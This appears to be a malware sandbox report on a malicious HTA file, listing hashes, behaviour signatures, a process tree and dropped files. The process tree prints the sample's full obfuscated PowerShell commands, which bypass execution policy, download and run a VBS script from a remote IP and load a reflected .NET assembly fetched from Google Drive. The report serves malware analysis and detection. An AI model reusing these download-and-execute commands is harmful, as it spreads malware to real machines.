Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
23-10-2024 06:01
Static task
static1
Behavioral task
behavioral1
Sample
greatwayforbestthignswithwhonotwanttodo.hta
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
greatwayforbestthignswithwhonotwanttodo.hta
Resource
win10v2004-20241007-en
General
-
Target
greatwayforbestthignswithwhonotwanttodo.hta
-
Size
130KB
-
MD5
67a5ad5e7caf5c79cb209e433c345c0b
-
SHA1
15776cf58dee4ecb7b42b2836539d8d553bf5439
-
SHA256
5d06cbde318e42ef7e39a6af52d96576aec4f11477101e4c90718f12c09c5eb4
-
SHA512
b6b697d11dca698441116526bad13c366ba78b477b7489372fff4155a3a06fc49a6487cf2e7a6e33855b7ac7c57dc0c99760a6fe54e77f2b2ec51539a6f5ee96
-
SSDEEP
192:Ea2xJKbBKWvKbBRWGWiJnKbBxKbBDWNTKbBUT:UWSHWi0yW22
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 2640 powERShEll.EXe 6 1164 powershell.exe 8 1164 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2512 powershell.exe 1164 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 2640 powERShEll.EXe 2796 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 5 drive.google.com 6 drive.google.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powERShEll.EXe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2640 powERShEll.EXe 2796 powershell.exe 2640 powERShEll.EXe 2640 powERShEll.EXe 2512 powershell.exe 1164 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2640 powERShEll.EXe Token: SeDebugPrivilege 2796 powershell.exe Token: SeDebugPrivilege 2512 powershell.exe Token: SeDebugPrivilege 1164 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 1504 wrote to memory of 2640 1504 mshta.exe 30 PID 1504 wrote to memory of 2640 1504 mshta.exe 30 PID 1504 wrote to memory of 2640 1504 mshta.exe 30 PID 1504 wrote to memory of 2640 1504 mshta.exe 30 PID 2640 wrote to memory of 2796 2640 powERShEll.EXe 32 PID 2640 wrote to memory of 2796 2640 powERShEll.EXe 32 PID 2640 wrote to memory of 2796 2640 powERShEll.EXe 32 PID 2640 wrote to memory of 2796 2640 powERShEll.EXe 32 PID 2640 wrote to memory of 2844 2640 powERShEll.EXe 33 PID 2640 wrote to memory of 2844 2640 powERShEll.EXe 33 PID 2640 wrote to memory of 2844 2640 powERShEll.EXe 33 PID 2640 wrote to memory of 2844 2640 powERShEll.EXe 33 PID 2844 wrote to memory of 2980 2844 csc.exe 34 PID 2844 wrote to memory of 2980 2844 csc.exe 34 PID 2844 wrote to memory of 2980 2844 csc.exe 34 PID 2844 wrote to memory of 2980 2844 csc.exe 34 PID 2640 wrote to memory of 2752 2640 powERShEll.EXe 36 PID 2640 wrote to memory of 2752 2640 powERShEll.EXe 36 PID 2640 wrote to memory of 2752 2640 powERShEll.EXe 36 PID 2640 wrote to memory of 2752 2640 powERShEll.EXe 36 PID 2752 wrote to memory of 2512 2752 WScript.exe 37 PID 2752 wrote to memory of 2512 2752 WScript.exe 37 PID 2752 wrote to memory of 2512 2752 WScript.exe 37 PID 2752 wrote to memory of 2512 2752 WScript.exe 37 PID 2512 wrote to memory of 1164 2512 powershell.exe 39 PID 2512 wrote to memory of 1164 2512 powershell.exe 39 PID 2512 wrote to memory of 1164 2512 powershell.exe 39 PID 2512 wrote to memory of 1164 2512 powershell.exe 39
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\greatwayforbestthignswithwhonotwanttodo.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1504 -
C:\Windows\SysWOW64\WINdOwspoWErSHeLL\V1.0\powERShEll.EXe"C:\Windows\SySTeM32\WINdOwspoWErSHeLL\V1.0\powERShEll.EXe" "POWerSHELl.EXE -ex BYPAss -NoP -W 1 -c DeVIcecrEdeNtIalDeploYMent ; IeX($(Iex('[sysTEm.TExt.enCODINg]'+[cHaR]58+[chaR]0x3a+'UTF8.GetStRing([sYStEm.cOnvErT]'+[ChaR]0X3A+[chaR]58+'fromBaSe64sTrIng('+[CHar]34+'JEN3a1ZBMXJLTlgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJlckRFZmlOaXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtb24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTk9rdSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFF2ZVlheCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNxSk9USUEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidGh1RlpYIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWVTUEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEN3a1ZBMXJLTlgxOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80Mi9zaW1wbGV0aGluZ3N3aXRoZ3JlYXRmdXR1cmViZXR0ZXJvbmVnZXRiYWNrZm9ybWUudElGIiwiJEVOdjpBUFBEQVRBXHNpbXBsZXRoaW5nc3dpdGhncmVhdGZ1dHVyZWJldHRlcm9uZWdldGJhLnZicyIsMCwwKTtzdEFSVC1TTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaW1wbGV0aGluZ3N3aXRoZ3JlYXRmdXR1cmViZXR0ZXJvbmVnZXRiYS52YnMi'+[cHar]34+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYPAss -NoP -W 1 -c DeVIcecrEdeNtIalDeploYMent3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2796
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hgq9bbh1.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAE4A.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCAE49.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2980
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\simplethingswithgreatfuturebetteronegetba.vbs"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2752 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnZTZvaW1hZ2VVcmwgPSB6U3JodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciB6U3I7ZTZvd2ViQ2xpZW50ID0gTmV3LU9iamVjdCcrJyBTeXN0ZW0uTmV0LldlYkNsaWVudDtlNm9pbWFnZUJ5dGVzID0gZTZvd2ViQ2xpZW50LicrJ0Rvd25sb2FkRGF0YShlNm9pbWFnZVVybCk7ZTZvaW1hZ2VUJysnZXh0ID0gW1N5c3RlbS5UJysnZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoZTZvaW1hZ2VCeXRlcyk7ZTZvc3RhcnRGbGFnID0gelNyPDxCQVNFNjRfU1RBUlQ+PnpTcjtlNm9lbmRGbGFnID0gelNyPDxCQVNFNjRfRU5EPj56U3I7ZTZvc3RhcnRJbmRleCA9IGU2b2ltYWdlVGV4dC5JbmRleE9mKGU2b3N0YXJ0RmxhZyk7ZTZvJysnZW5kSW5kZXggPSBlNm9pbWFnZVRleHQuSW5kZXhPZihlNm9lbmRGbGFnKTtlNm8nKydzJysndGFydEluZGV4IC1nZSAwIC1hbmQgZTZvZW5kSW5kZXggLWd0IGU2b3N0YXJ0SW5kZXg7ZTZvc3RhcnRJbmRleCArPSBlNm9zdGFydEZsYWcuTGVuZ3RoO2U2b2Jhc2U2NExlbmd0aCA9IGU2b2VuZEluZGV4IC0gZTZvc3RhJysncnRJbmRleDtlNm9iJysnYXNlNjRDb21tYW5kID0gZTZvaScrJ21hZ2VUZXh0LlN1YnN0cmluZygnKydlNm9zdGFydEluZGV4LCBlNm9iYXNlNjRMZW5ndGgnKycpO2U2b2Jhc2U2NFJldmVyc2VkID0gLWpvaW4gKGU2b2Jhc2U2NENvbW1hbmQuVG9DaGFyQXJyYScrJ3koKSAnKydDcHcgRm9yRWFjaCcrJy1PYmplY3QgeyBlNm9fIH0pWy0xLi4tKGU2b2Jhc2U2NENvbW1hbmQnKycuTCcrJ2VuZ3RoKV07ZTZvY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhlNm9iYXNlNjRSZXZlcnNlZCk7ZTZvbG9hZGUnKydkQXNzZW1ibHkgPSBbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2EnKydkKGU2b2NvbW1hbmRCeXRlcyk7ZTZvdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh6U3JWQUl6U3InKycpO2U2b3ZhaU1ldGhvZC5JbnZvaycrJ2UoZTZvbnVsbCwgQCh6U3J0eHQuVkdGVkJSUy8yNC8nKycxJysnNDEuNjcnKycxLjMuMjkxLy86cCcrJ3R0aHpTciwgeicrJ1NyZGVzYXRpdmFkb3pTciwgeicrJ1NyZGUnKydzJysnYXRpdmFkb3pTciwgelNyZGVzYXRpdmEnKydkb3pTciwgelNyQ2FzUG9selNyLCB6U3JkZXNhdGl2YWRvelNyLCcrJyB6U3JkZXNhdGl2YWRvelNyLHpTcmRlc2EnKyd0aXZhZG96U3IselNyZGVzYXRpdmFkb3pTcix6U3JkZXNhdGl2JysnYScrJ2RvelNyLHpTcmRlc2F0aXZhZG96U3IselNyZGVzYXQnKydpdmFkb3pTcix6U3IxelNyLHpTcmRlc2F0aXZhZG96U3IpKScrJzsnKS1SZXBsYUNFIChbQ0hhcl0xMjIrW0NIYXJdODMrW0NIYXJdMTE0KSxbQ0hhcl0zOSAtY3JFcExhQ0UnZTZvJyxbQ0hhcl0zNi1SZXBsYUNFIChbQ0hhcl02NytbQ0hhcl0xMTIrW0NIYXJdMTE5KSxbQ0hhcl0xMjQpIHwmICggJHBTaE9tZVsyMV0rJHBzSE9tZVszNF0rJ3gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('e6oimageUrl = zSrhttps://drive.google.com/uc?export=downloa'+'d&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zSr;e6owebClient = New-Object'+' System.Net.WebClient;e6oimageBytes = e6owebClient.'+'DownloadData(e6oimageUrl);e6oimageT'+'ext = [System.T'+'ext.Encoding]::UTF8.GetString(e6oimageBytes);e6ostartFlag = zSr<<BASE64_START>>zSr;e6oendFlag = zSr<<BASE64_END>>zSr;e6ostartIndex = e6oimageText.IndexOf(e6ostartFlag);e6o'+'endIndex = e6oimageText.IndexOf(e6oendFlag);e6o'+'s'+'tartIndex -ge 0 -and e6oendIndex -gt e6ostartIndex;e6ostartIndex += e6ostartFlag.Length;e6obase64Length = e6oendIndex - e6osta'+'rtIndex;e6ob'+'ase64Command = e6oi'+'mageText.Substring('+'e6ostartIndex, e6obase64Length'+');e6obase64Reversed = -join (e6obase64Command.ToCharArra'+'y() '+'Cpw ForEach'+'-Object { e6o_ })[-1..-(e6obase64Command'+'.L'+'ength)];e6ocommandBytes = [System.Convert]::FromBase64String(e6obase64Reversed);e6oloade'+'dAssembly = [Syst'+'em.Reflection.Assembly]::Loa'+'d(e6ocommandBytes);e6ovaiMethod = [dnlib.IO.Home].GetMethod(zSrVAIzSr'+');e6ovaiMethod.Invok'+'e(e6onull, @(zSrtxt.VGFVBRS/24/'+'1'+'41.67'+'1.3.291//:p'+'tthzSr, z'+'SrdesativadozSr, z'+'Srde'+'s'+'ativadozSr, zSrdesativa'+'dozSr, zSrCasPolzSr, zSrdesativadozSr,'+' zSrdesativadozSr,zSrdesa'+'tivadozSr,zSrdesativadozSr,zSrdesativ'+'a'+'dozSr,zSrdesativadozSr,zSrdesat'+'ivadozSr,zSr1zSr,zSrdesativadozSr))'+';')-ReplaCE ([CHar]122+[CHar]83+[CHar]114),[CHar]39 -crEpLaCE'e6o',[CHar]36-ReplaCE ([CHar]67+[CHar]112+[CHar]119),[CHar]124) |& ( $pShOme[21]+$psHOme[34]+'x')"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1164
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD58a1f03435a459a81166ebbe13d365d3f
SHA1c76c6494d54811a76edce2036dddba96b5404c1f
SHA256acb0a83823a8bc43b746e1c420206b70a8b021b87b05b91171375b2c130ba599
SHA51241f64409878256bca8aa57ecc14959893dcd1e01162997a4f37058329b5b45bb1a3826c4296c5befda4e3cfdcd4f6363df9d511225e40d00b2f2b4ce28ca65f2
-
Filesize
3KB
MD52f638fb1eba866d56f423d31451aceb7
SHA16f1cc200732d1aced11a3f5284f9d60b16214cd8
SHA2562309e54db417200c0389403337645efee17787cc5d5958aeaac1a929df4afed7
SHA512819a38442c6349da4996da547ea4627d91597dd583c449bfd230f056d1597a9eed890ce1e3106b71e76152d20b0158884813e25b41320b837a3cdb2ba0e93e53
-
Filesize
7KB
MD5730303f36c1c128be833bf6234a3a972
SHA1025a7414d4e5b6d4fe1e38fd24261937749e6c89
SHA256d34421800a99463f44a470b48bd8037945302abfbb79a6252458a3d63c0b2f1c
SHA51208ec3777f9895de8868885cd12c59ab622dead4d49984be2f9cde8f33dceb99dc51600d0fdc93302b22c24477f48d9c87a4d210bf805f341f5d737184aec9d37
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5b8f489dc283ce131d151cc023dff59bc
SHA1e81c63d7ff5f9a738ee43290fe0d513b7d3f5b41
SHA256ae1b74f4367e89e8465eac9b8396e93464dcf2fd61ecd76f0c42a7206d78dbbb
SHA51231adb7d75d55a9fe72b30bb74d0d326f2f5b959dda9a009acd61fcd8534ed380981b9f8c57315983701843cbf113680e939faada4aba5fc30b5c442fcfb9234e
-
Filesize
137KB
MD55a9b34ae3fd1ec59f9be56049cdbc50a
SHA19a32f9c0054525e2cb7693df834748f8d2960f97
SHA256dadfc399131b08b48b3b2fbcabbcced43397183a41f9213ca046db03258aa3e3
SHA512d951e1def250c743f06e1c6e83a837c43457ce37101ef93db5416efb52db8e49b2ab4998489b2b51dd135d04e4e661bf529c5f5da3b1915358dbfc1959d9ec93
-
Filesize
652B
MD5ca4592db77543d4f9b3e08d3cfe0c201
SHA13db05ead44a9f8ef703d53f32ea9daa9ba5d0454
SHA256d81be211b136f1466b37e3077a996919272e5623ca5162ae4d1c71297d69ce90
SHA512f6dc24b309353262b0db0c5ef564df6a3df44f5ef039b696eff26824e31e7b125607278a9dde67bf06f3967ef64113a136e662776299315c401beb0da70a23e1
-
Filesize
459B
MD5215ff4cb51532af3e78a4f759fc9aa11
SHA193b2983039e8a5ca1f4fba93f4d239e48ca38b94
SHA256182126a701d9770a97367ac204a3e73a1011c253bc8ec5b83b72fac429595641
SHA51272194a7d39a43d0bc2fbac563b102b28c942cc561e631e35f8324ca54d8d775c529b22eba6655f5fdb65d367e3a864ecc371423e1c2c7e7b62a8b8f7c191fd97
-
Filesize
309B
MD5bc9fa7f3785f09ee341584ad4c80e23a
SHA12c890c5ae3138ee02a4c3c4944a8ece79c13b79c
SHA256b37dfbf32a7d694543619b8a006cec5d3785277664833f52da7afd82f2038793
SHA512549ace95b6de70e1ae390e0aec15101bd31edcb09e295e534d19bf899d8eaf8c1564ea8d9b72b280e8c02ee0304af0b65da23c7ad97c4f68d6585638643d46a9